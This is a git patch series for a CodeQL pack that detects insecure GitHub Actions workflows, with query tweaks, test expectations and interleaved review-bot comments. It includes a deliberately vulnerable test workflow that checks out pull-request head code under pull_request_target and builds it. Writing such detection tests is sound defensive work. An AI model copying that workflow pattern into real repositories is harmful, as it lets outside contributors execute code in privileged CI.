@@ -41,16 +41,16 @@ nodes | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | subpaths #select -| .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | -| .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | ./x.py build -j$(nproc) --compiler gcc --skip-build | -| .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | Potential privileged artifact poisoning in $@, which may be controlled by an external user. 
| .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | sh foo/cmd\n | -| .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | sh cmd | -| .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | ./foo/cmd | -| .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | ./bar/cmd\n | -| .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | ./bar/cmd\n | -| .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | Potential privileged artifact poisoning in $@, which may be controlled by an external user. 
| .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | npm install\nnpm run lint\n | -| .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | ./foo/cmd | -| .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | ./cmd | -| .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | Potential privileged artifact poisoning in $@, which may be controlled by an external user. 
| .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | -| .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | -| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | Potential privileged artifact poisoning in $@, which may be controlled by an external user. 
| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | +| .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | ./x.py build -j$(nproc) --compiler gcc --skip-build | +| .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | sh foo/cmd\n | +| .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | Potential artifact poisoning in $@, which may be controlled by an external user. 
| .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | sh cmd | +| .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | ./foo/cmd | +| .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | ./bar/cmd\n | +| .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | ./bar/cmd\n | +| .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | npm install\nnpm run lint\n | +| .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | Potential artifact poisoning in $@, which may be controlled by an external user. 
| .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | ./foo/cmd | +| .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | ./cmd | +| .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | +| .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | Potential artifact poisoning in $@, which may be controlled by an external user. 
| .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | +| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.qlref b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.qlref new file mode 100644 index 000000000000..4f8d2af04e8d --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.qlref @@ -0,0 +1,2 @@ +Security/CWE-829/ArtifactPoisoningCritical.ql + diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected similarity index 100% rename from ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.expected rename to ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.qlref b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.qlref new file mode 100644 index 000000000000..39548f274127 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.qlref @@ -0,0 +1,2 @@ +Security/CWE-829/ArtifactPoisoningMedium.ql + 
diff --git a/ql/test/query-tests/Security/CWE-829/PrivilegedArtifactPoisoning.qlref b/ql/test/query-tests/Security/CWE-829/PrivilegedArtifactPoisoning.qlref
deleted file mode 100644
index 3c8de29c4502..000000000000
--- a/ql/test/query-tests/Security/CWE-829/PrivilegedArtifactPoisoning.qlref
+++ /dev/null
@@ -1,2 +0,0 @@
-Security/CWE-829/PrivilegedArtifactPoisoning.ql
-
diff --git a/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutCritical.qlref b/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutCritical.qlref
deleted file mode 100644
index 8fe52c7d9147..000000000000
--- a/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutCritical.qlref
+++ /dev/null
@@ -1 +0,0 @@
-Security/CWE-829/PrivilegedUntrustedCheckoutCritical.ql
diff --git a/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.qlref b/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.qlref
deleted file mode 100644
index 32953132a45a..000000000000
--- a/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.qlref
+++ /dev/null
@@ -1 +0,0 @@
-Security/CWE-829/PrivilegedUntrustedCheckoutHigh.ql
diff --git a/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected
similarity index 100%
rename from ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutCritical.expected
rename to ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected
diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.qlref b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.qlref
new file mode 100644
index 000000000000..9f17733e16e8
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.qlref
@@ -0,0 +1 @@
+Security/CWE-829/UntrustedCheckoutCritical.ql
diff --git a/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected
similarity index 100%
rename from ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.expected
rename to ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected
diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.qlref b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.qlref
new file mode 100644
index 000000000000..66b3f2cd9bf2
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.qlref
@@ -0,0 +1 @@
+Security/CWE-829/UntrustedCheckoutHigh.ql
diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected
new file mode 100644
index 000000000000..e69de29bb2d1
diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.qlref b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.qlref
new file mode 100644
index 000000000000..55bb194f5ecd
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.qlref
@@ -0,0 +1 @@
+Security/CWE-829/UntrustedCheckoutMedium.ql
From e86fa9744aef3783108d225812be2e528ef116c1 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Tue, 21 May 2024 23:05:30 +0200
Subject: [PATCH 303/707] Bump qlpack versions
---
 ql/lib/qlpack.yml | 2 +-
 ql/src/qlpack.yml | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)
diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml
index b1a100a7040e..b3f4a7b112ee 100644
--- a/ql/lib/qlpack.yml
+++ b/ql/lib/qlpack.yml
@@ -2,7 +2,7 @@
 library: true
 warnOnImplicitThis: true
 name: githubsecuritylab/actions-all
-version: 0.0.26
+version: 0.0.27
 dependencies:
 codeql/util: ^0.2.0
 codeql/yaml: ^0.1.2
diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml
index 341b6f45c298..c0aa886d0429 100644
--- a/ql/src/qlpack.yml
+++ b/ql/src/qlpack.yml
@@ -1,7 +1,7 @@
 ---
 library: false
 name: githubsecuritylab/actions-queries
-version: 0.0.26
+version: 0.0.27
 groups:
 - actions
 - queries
From 4d28d6aa7c74ac627926882a9997c4cb95d65b6c Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Wed, 22 May 2024 11:07:52 +0200
Subject: [PATCH 304/707] Improve toctou queries
---
 ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql | 2 +-
 ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql | 2 +-
 .../query-tests/Security/CWE-094/CodeInjectionMedium.expected | 1 -
 3 files changed, 2 insertions(+), 3 deletions(-)
diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql
index 2144db7afa0c..ff9148ab5833 100644
--- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql
+++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql
@@ -18,7 +18,7 @@ import codeql.actions.security.PoisonableSteps
 from ControlCheck check, MutableRefCheckoutStep checkout
 where
 // the job can be triggered by an external user
- check.getEnclosingJob().isExternallyTriggerable() and
+ inPrivilegedExternallyTriggerableJob(check) and
 // the mutable checkout step is protected by an access check
 check = [checkout.getIf(), checkout.getEnclosingJob().getIf()] and
 // the checked-out code may lead to arbitrary code execution
diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql
index 11dfa7fc5670..c1118bc00cab 100644
--- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql
+++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql
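Review bot: The comment kept above the changed line, `// the job can be triggered by an external user`, no longer matches the condition: `inPrivilegedExternallyTriggerableJob(check)` by its name also requires the job to be privileged, so the comment should become `// the job is privileged and can be triggered by an external user`. The same stale comment remains in the UntrustedCheckoutTOCTOUHigh.ql hunk of this commit. Neither hunk shows where `inPrivilegedExternallyTriggerableJob` is defined, so it presumably comes from one of the imports above the hunk; the `where` clause continues past the end of the hunk.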
@@ -18,7 +18,7 @@ import codeql.actions.security.PoisonableSteps
 from ControlCheck check, MutableRefCheckoutStep checkout
 where
 // the job can be triggered by an external user
- check.getEnclosingJob().isExternallyTriggerable() and
+ inPrivilegedExternallyTriggerableJob(check) and
 // the mutable checkout step is protected by an access check
 check = [checkout.getIf(), checkout.getEnclosingJob().getIf()] and
 // there are no evidences that the checked-out code can lead to arbitrary code execution
diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected
index 298c4ce75a48..4fb130aa07a8 100644
--- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected
+++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected
@@ -233,7 +233,6 @@ nodes
 | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | semmle.label | needs.parse-issue.outputs.payload |
 | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | semmle.label | toJSON(github.event.comment) |
 | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | semmle.label | toJSON(github.event.issue) |
-| .github/workflows/test4.yml:23:21:23:41 | toJSON(github) | semmle.label | toJSON(github) |
 | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | semmle.label | toJSON(github.event) |
 | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] |
 | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 |
From 367531a6597fcfd5a09735bd7c9e9a372ea6a446 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Wed, 22 May 2024 11:08:22 +0200
Subject: [PATCH 305/707] Bump qlpack versions
---
 ql/lib/qlpack.yml | 2 +-
 ql/src/qlpack.yml | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)
diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml
index b3f4a7b112ee..649064e1ddd5 100644
--- a/ql/lib/qlpack.yml
+++ b/ql/lib/qlpack.yml
@@ -2,7 +2,7 @@
 library: true
 warnOnImplicitThis: true
 name: githubsecuritylab/actions-all
-version: 0.0.27
+version: 0.0.28
 dependencies:
 codeql/util: ^0.2.0
 codeql/yaml: ^0.1.2
diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml
index c0aa886d0429..d0d7e48a1b2e 100644
--- a/ql/src/qlpack.yml
+++ b/ql/src/qlpack.yml
@@ -1,7 +1,7 @@
 ---
 library: false
 name: githubsecuritylab/actions-queries
-version: 0.0.27
+version: 0.0.28
 groups:
 - actions
 - queries
From 33ae3b1625dc60d5b9a8c32b1e70fe0920395c17 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Wed, 22 May 2024 18:53:39 +0200
Subject: [PATCH 306/707] minor updates
---
 .../actions/security/PoisonableSteps.qll | 2 +-
 .../security/UntrustedCheckoutQuery.qll | 4 +--
 .../CWE-349/.github/workflows/test17.yml | 27 +++++++++++++++++++
 3 files changed, 30 insertions(+), 3 deletions(-)
 create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test17.yml
diff --git a/ql/lib/codeql/actions/security/PoisonableSteps.qll b/ql/lib/codeql/actions/security/PoisonableSteps.qll
index 40dfbd3a0b09..646dc35d1f4e 100644
--- a/ql/lib/codeql/actions/security/PoisonableSteps.qll
+++ b/ql/lib/codeql/actions/security/PoisonableSteps.qll
@@ -5,7 +5,7 @@ abstract class PoisonableStep extends Step { }
 // source: https://github.com/boostsecurityio/poutine/blob/main/opa/rego/rules/untrusted_checkout_exec.rego#L16
 private string dangerousActions() {
 result =
- ["pre-commit/action", "oxsecurity/megalinter", "bridgecrewio/checkov-action", "ruby/setup-ruby"]
+ ["pre-commit/action", "oxsecurity/megalinter", "bridgecrewio/checkov-action", "ruby/setup-ruby", "actions/jekyll-build-pages"]
 }
 
 class DangerousActionUsesStep extends PoisonableStep, UsesStep {
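Review bot: The new `result =` list line in `dangerousActions()` is far longer than the width `codeql query format` keeps, so the next formatting pass will reflow it into an unrelated diff; break the list one entry per line now. The comment above the predicate credits the poutine `untrusted_checkout_exec.rego` list as the source, and `actions/jekyll-build-pages` may be a local addition, so a one-line comment next to the new entry stating why it is treated as poisonable (the CWE-349 `test17.yml` fixture added in this commit runs it after checking out the pull request head under `pull_request_target`) would keep the citation accurate.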
diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll
index aeceaa8da756..3bc1f3649a3b 100644
--- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll
+++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll
@@ -108,8 +108,8 @@ class ActionsMutableRefCheckout extends MutableRefCheckoutStep instanceof UsesSt
 exists(StepsExpression e |
 this.getArgumentExpr("ref") = e and
 (
- e.getStepId().matches(["%ref%", "%branch%"]) or
- e.getFieldName().matches(["%ref%", "%branch%"])
+ e.getStepId().matches(["%head%", "%pull_request%", "%_pr_%"]) or
+ e.getFieldName().matches(["%head%", "%pull_request%", "%_pr_%"])
 )
 )
 )
diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test17.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test17.yml
new file mode 100644
index 000000000000..60ba26406c62
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test17.yml
@@ -0,0 +1,27 @@
+name: Test
+
+on:
+ # Runs on pull requests targeting the default branch
+ pull_request_target:
+ branches: ["main"]
+
+jobs:
+ build:
+ # Limit permissions of the GITHUB_TOKEN for untrusted code
+ permissions:
+ contents: read
+ runs-on: ubuntu-latest
+ steps:
+ - name: Checkout
+ uses: actions/checkout@v4
+ with:
+ ref: ${{ github.event.pull_request.head.ref }}
+ repository: ${{ github.event.pull_request.head.repo.full_name }}
+ - name: Setup Pages
+ uses: actions/configure-pages@v5
+ - name: Build with Jekyll
+ uses: actions/jekyll-build-pages@v1
+ with:
+ source: ./
+ destination: ./_site
+
From 16a752280785289f02297e6995bba7a4a97e5ea5 Mon Sep 17 00:00:00 2001
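Review bot: In QL's `string.matches`, `_` is a single-character wildcard, so the new `"%_pr_%"` pattern matches any step id or field name containing `pr` with one character on each side (`spread`, `deprecated`, …) rather than a literal `_pr_`; if the underscores are meant literally they need escaping, `"%\\_pr\\_%"`, and the same holds for the `_` in `"%pull_request%"` (harmless there). Dropping `"%ref%"` and `"%branch%"` also means a step output simply named `ref` or `branch` no longer counts as a mutable-ref checkout; a later commit in this series rewrites the list again. The `ActionsMutableRefCheckout` class body continues outside the hunk.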
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 22 May 2024 23:24:17 +0200 Subject: [PATCH 307/707] Improve Untrusted checkout queries --- ql/lib/codeql/actions/ast/internal/Ast.qll | 31 ++++++++++++----- .../security/UntrustedCheckoutQuery.qll | 8 ++--- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- .../CWE-094/CodeInjectionCritical.expected | 2 ++ .../CWE-094/CodeInjectionMedium.expected | 2 -- .../Security/CWE-349/CachePoisoning.expected | 1 + .../CWE-829/.github/workflows/mend.yml | 33 +++++++++++++++++++ .../workflows/priv_pull_request_checkout.yml | 23 +++++++++++++ .../CWE-829/UnpinnedActionsTag.expected | 1 + .../UntrustedCheckoutCritical.expected | 2 ++ 11 files changed, 90 insertions(+), 17 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/mend.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/priv_pull_request_checkout.yml diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index ebe2c70533d9..61f0fa8e36e9 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll 
@@ -748,7 +748,13 @@ class JobImpl extends AstNodeImpl, TJobNode {
 
 /** Holds if the job can be triggered by an external actor. */
 predicate isExternallyTriggerable() {
- externallyTriggerableEventsDataModel(this.getATriggerEvent().getName())
+ // the job is triggered by an event that can be triggered externally
+ externallyTriggerableEventsDataModel(this.getATriggerEvent().getName()) or
+ // the job is triggered by a workflow_call event that can be triggered externally
+ this.getATriggerEvent().getName() = "workflow_call" and
